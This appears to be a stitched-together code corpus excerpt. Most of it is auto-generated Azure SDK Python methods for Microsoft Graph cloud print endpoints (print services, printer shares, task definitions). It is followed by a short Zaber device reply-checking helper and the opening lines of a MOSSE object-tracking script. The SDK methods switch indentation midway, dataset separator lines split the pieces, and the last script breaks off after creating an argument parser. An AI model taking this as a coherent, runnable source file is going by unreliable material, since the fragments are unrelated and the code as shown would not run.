    :return: MicrosoftGraphPrintService, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintService
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintService"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # POST to the collection URL; no query parameters are used.
    url = self.create_services.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the new entity as the request payload.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['content'] = self._serialize.body(body, 'MicrosoftGraphPrintService')
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrintService', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_services.metadata = {'url': '/print/services'}  # type: ignore
def get_services(
    self,
    print_service_id,  # type: str
    select=None,  # type: Optional[List[Union[str, "models.Enum80"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum81"]]]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrintService"
    """Get services from print.

    :param print_service_id: key: id of printService.
    :type print_service_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum80]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum81]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrintService, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintService
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintService"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
    }
    url = self._client.format_url(self.get_services.metadata['url'], **path_format_arguments)  # type: ignore

    # Optional OData projection/expansion options.
    query_parameters = {}  # type: Dict[str, Any]
    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrintService', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_services.metadata = {'url': '/print/services/{printService-id}'}  # type: ignore
def update_services(
    self,
    print_service_id,  # type: str
    body,  # type: "models.MicrosoftGraphPrintService"
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Update the navigation property services in print.

    :param print_service_id: key: id of printService.
    :type print_service_id: str
    :param body: New navigation property values.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrintService
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
    }
    url = self._client.format_url(self.update_services.metadata['url'], **path_format_arguments)  # type: ignore

    # PATCH takes no query parameters.
    query_parameters = {}  # type: Dict[str, Any]

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the updated property values as the request payload.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['content'] = self._serialize.body(body, 'MicrosoftGraphPrintService')
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_services.metadata = {'url': '/print/services/{printService-id}'}  # type: ignore
def delete_services(
    self,
    print_service_id,  # type: str
    if_match=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete navigation property services for print.

    :param print_service_id: key: id of printService.
    :type print_service_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printService-id': self._serialize.url("print_service_id", print_service_id, 'str'),
    }
    url = self._client.format_url(self.delete_services.metadata['url'], **path_format_arguments)  # type: ignore

    # This operation takes no query parameters.
    query_parameters = {}  # type: Dict[str, Any]

    # If-Match is only sent when the caller supplied an ETag.
    header_parameters = {}  # type: Dict[str, Any]
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_services.metadata = {'url': '/print/services/{printService-id}'}  # type: ignore
def list_shares(
    self,
    orderby=None,  # type: Optional[List[Union[str, "models.Enum85"]]]
    select=None,  # type: Optional[List[Union[str, "models.Enum86"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum87"]]]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.CollectionOfPrinterShare1"]
    """Get shares from print.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~devices_cloud_print.models.Enum85]
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum86]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum87]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfPrinterShare1 or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrinterShare1]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrinterShare1"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if next_link:
            # Follow-up pages: the service-provided link already encodes the query.
            return self._client.get(next_link, {}, header_parameters)

        # First page: client-level paging options plus the caller's OData options.
        url = self.list_shares.metadata['url']  # type: ignore
        query_parameters = {}  # type: Dict[str, Any]
        if self._config.top is not None:
            query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
        if self._config.skip is not None:
            query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
        if self._config.search is not None:
            query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
        if self._config.filter is not None:
            query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
        if self._config.count is not None:
            query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
        if orderby is not None:
            query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
        return self._client.get(url, query_parameters, header_parameters)

    def extract_data(pipeline_response):
        deserialized = self._deserialize('CollectionOfPrinterShare1', pipeline_response)
        elements = deserialized.value
        if cls:
            elements = cls(elements)
        return deserialized.odata_next_link or None, iter(elements)

    def get_next(next_link=None):
        pipeline_response = self._client._pipeline.run(prepare_request(next_link), stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(get_next, extract_data)
list_shares.metadata = {'url': '/print/shares'}  # type: ignore
def create_shares(
    self,
    body,  # type: "models.MicrosoftGraphPrinterShare"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinterShare"
    """Create new navigation property to shares for print.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinterShare, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinterShare"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # POST to the collection URL; no query parameters are used.
    url = self.create_shares.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the new entity as the request payload.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['content'] = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_shares.metadata = {'url': '/print/shares'}  # type: ignore
def get_shares(
    self,
    printer_share_id,  # type: str
    select=None,  # type: Optional[List[Union[str, "models.Enum88"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum89"]]]
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrinterShare"
    """Get shares from print.

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum88]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum89]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrinterShare, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrinterShare"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
    }
    url = self._client.format_url(self.get_shares.metadata['url'], **path_format_arguments)  # type: ignore

    # Optional OData projection/expansion options.
    query_parameters = {}  # type: Dict[str, Any]
    if select is not None:
        query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
    if expand is not None:
        query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrinterShare', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get_shares.metadata = {'url': '/print/shares/{printerShare-id}'}  # type: ignore
def update_shares(
    self,
    printer_share_id,  # type: str
    body,  # type: "models.MicrosoftGraphPrinterShare"
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Update the navigation property shares in print.

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param body: New navigation property values.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
    }
    url = self._client.format_url(self.update_shares.metadata['url'], **path_format_arguments)  # type: ignore

    # PATCH takes no query parameters.
    query_parameters = {}  # type: Dict[str, Any]

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the updated property values as the request payload.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['content'] = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
    request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
update_shares.metadata = {'url': '/print/shares/{printerShare-id}'}  # type: ignore
def delete_shares(
    self,
    printer_share_id,  # type: str
    if_match=None,  # type: Optional[str]
    **kwargs  # type: Any
):
    # type: (...) -> None
    """Delete navigation property shares for print.

    :param printer_share_id: key: id of printerShare.
    :type printer_share_id: str
    :param if_match: ETag.
    :type if_match: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: None, or the result of cls(response)
    :rtype: None
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    # Expand the URL template with the entity key.
    path_format_arguments = {
        'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
    }
    url = self._client.format_url(self.delete_shares.metadata['url'], **path_format_arguments)  # type: ignore

    # This operation takes no query parameters.
    query_parameters = {}  # type: Dict[str, Any]

    # If-Match is only sent when the caller supplied an ETag.
    header_parameters = {}  # type: Dict[str, Any]
    if if_match is not None:
        header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})
delete_shares.metadata = {'url': '/print/shares/{printerShare-id}'}  # type: ignore
def list_task_definitions(
    self,
    orderby=None,  # type: Optional[List[Union[str, "models.Enum98"]]]
    select=None,  # type: Optional[List[Union[str, "models.Enum99"]]]
    expand=None,  # type: Optional[List[Union[str, "models.Enum100"]]]
    **kwargs  # type: Any
):
    # type: (...) -> Iterable["models.CollectionOfPrintTaskDefinition"]
    """Get taskDefinitions from print.

    :param orderby: Order items by property values.
    :type orderby: list[str or ~devices_cloud_print.models.Enum98]
    :param select: Select properties to be returned.
    :type select: list[str or ~devices_cloud_print.models.Enum99]
    :param expand: Expand related entities.
    :type expand: list[str or ~devices_cloud_print.models.Enum100]
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either CollectionOfPrintTaskDefinition or the result of cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintTaskDefinition]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.CollectionOfPrintTaskDefinition"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    accept = "application/json"

    def prepare_request(next_link=None):
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        if next_link:
            # Follow-up pages: the service-provided link already encodes the query.
            return self._client.get(next_link, {}, header_parameters)

        # First page: client-level paging options plus the caller's OData options.
        url = self.list_task_definitions.metadata['url']  # type: ignore
        query_parameters = {}  # type: Dict[str, Any]
        if self._config.top is not None:
            query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
        if self._config.skip is not None:
            query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
        if self._config.search is not None:
            query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
        if self._config.filter is not None:
            query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
        if self._config.count is not None:
            query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
        if orderby is not None:
            query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
        return self._client.get(url, query_parameters, header_parameters)

    def extract_data(pipeline_response):
        deserialized = self._deserialize('CollectionOfPrintTaskDefinition', pipeline_response)
        elements = deserialized.value
        if cls:
            elements = cls(elements)
        return deserialized.odata_next_link or None, iter(elements)

    def get_next(next_link=None):
        pipeline_response = self._client._pipeline.run(prepare_request(next_link), stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            error = self._deserialize(models.OdataError, response)
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        return pipeline_response

    return ItemPaged(get_next, extract_data)
list_task_definitions.metadata = {'url': '/print/taskDefinitions'}  # type: ignore
def create_task_definitions(
    self,
    body,  # type: "models.MicrosoftGraphPrintTaskDefinition"
    **kwargs  # type: Any
):
    # type: (...) -> "models.MicrosoftGraphPrintTaskDefinition"
    """Create new navigation property to taskDefinitions for print.

    :param body: New navigation property.
    :type body: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: MicrosoftGraphPrintTaskDefinition, or the result of cls(response)
    :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintTaskDefinition"]
    error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
    error_map.update(kwargs.pop('error_map', {}))
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # POST to the collection URL; no query parameters are used.
    url = self.create_task_definitions.metadata['url']  # type: ignore
    query_parameters = {}  # type: Dict[str, Any]

    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    # Serialize the new entity as the request payload.
    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content_kwargs['content'] = self._serialize.body(body, 'MicrosoftGraphPrintTaskDefinition')
    request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)

    pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        error = self._deserialize(models.OdataError, response)
        raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

    deserialized = self._deserialize('MicrosoftGraphPrintTaskDefinition', pipeline_response)
    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
create_task_definitions.metadata = {'url': '/print/taskDefinitions'}  # type: ignore
    def get_task_definitions(
        self,
        print_task_definition_id,  # type: str
        select=None,  # type: Optional[List[Union[str, "models.Enum101"]]]
        expand=None,  # type: Optional[List[Union[str, "models.Enum102"]]]
        **kwargs  # type: Any
    ):
        # type: (...) -> "models.MicrosoftGraphPrintTaskDefinition"
        """Get taskDefinitions from print.

        Get taskDefinitions from print.

        :param print_task_definition_id: key: id of printTaskDefinition.
        :type print_task_definition_id: str
        :param select: Select properties to be returned.
        :type select: list[str or ~devices_cloud_print.models.Enum101]
        :param expand: Expand related entities.
        :type expand: list[str or ~devices_cloud_print.models.Enum102]
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: MicrosoftGraphPrintTaskDefinition, or the result of cls(response)
        :rtype: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # NOTE(review): auto-generated Azure SDK operation (GET on a single
        # printTaskDefinition); prefer changing the code generator over hand-editing.
        cls = kwargs.pop('cls', None)  # type: ClsType["models.MicrosoftGraphPrintTaskDefinition"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL (path template comes from the metadata attached below)
        url = self.get_task_definitions.metadata['url']  # type: ignore
        path_format_arguments = {
            'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters ($select / $expand are OData options, comma-joined)
        query_parameters = {}  # type: Dict[str, Any]
        if select is not None:
            query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
        if expand is not None:
            query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Anything other than 200 is surfaced as an OData error
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('MicrosoftGraphPrintTaskDefinition', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'}  # type: ignore
    def update_task_definitions(
        self,
        print_task_definition_id,  # type: str
        body,  # type: "models.MicrosoftGraphPrintTaskDefinition"
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        """Update the navigation property taskDefinitions in print.

        Update the navigation property taskDefinitions in print.

        :param print_task_definition_id: key: id of printTaskDefinition.
        :type print_task_definition_id: str
        :param body: New navigation property values.
        :type body: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # NOTE(review): auto-generated Azure SDK operation (PATCH); keep edits in the generator.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update_task_definitions.metadata['url']  # type: ignore
        path_format_arguments = {
            'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters (none for this operation)
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Serialize the model into the request body and send the PATCH
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(body, 'MicrosoftGraphPrintTaskDefinition')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 204 No Content is the only success status for this PATCH
        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})
    update_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'}  # type: ignore
    def delete_task_definitions(
        self,
        print_task_definition_id,  # type: str
        if_match=None,  # type: Optional[str]
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        """Delete navigation property taskDefinitions for print.

        Delete navigation property taskDefinitions for print.

        :param print_task_definition_id: key: id of printTaskDefinition.
        :type print_task_definition_id: str
        :param if_match: ETag.
        :type if_match: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # NOTE(review): auto-generated Azure SDK operation (DELETE); keep edits in the generator.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        accept = "application/json"

        # Construct URL
        url = self.delete_task_definitions.metadata['url']  # type: ignore
        path_format_arguments = {
            'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters (none for this operation)
        query_parameters = {}  # type: Dict[str, Any]

        # Construct headers; the optional If-Match header carries the caller's ETag
        header_parameters = {}  # type: Dict[str, Any]
        if if_match is not None:
            header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 204 No Content is the only success status for this DELETE
        if response.status_code not in [204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(models.OdataError, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})
    delete_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'}  # type: ignore
| StarcoderdataPython |
def check_command_succeeded(reply):
    """Return True if the binary command succeeded.

    Prints the rejection reason and returns False when the device rejected
    the command.

    param reply: BinaryReply-like object exposing ``command_number`` and, on
        errors, ``data`` (the device error code).
    return: boolean
    """
    # Removed unused in-function imports (zaber.serial names, time) -- this
    # check only needs the reply object itself.
    if reply.command_number == 255:  # 255 is the binary error response code.
        print("Danger! Command rejected. Error code: " + str(reply.data))
        return False
    # Command was accepted
    return True
| StarcoderdataPython |
4806084 | <reponame>faderani/mosse-object-tracking
from mosse import mosse
import argparse
# CLI options for the MOSSE correlation-filter tracker. Defined at module
# level so the __main__ block below can parse them.
parse = argparse.ArgumentParser()
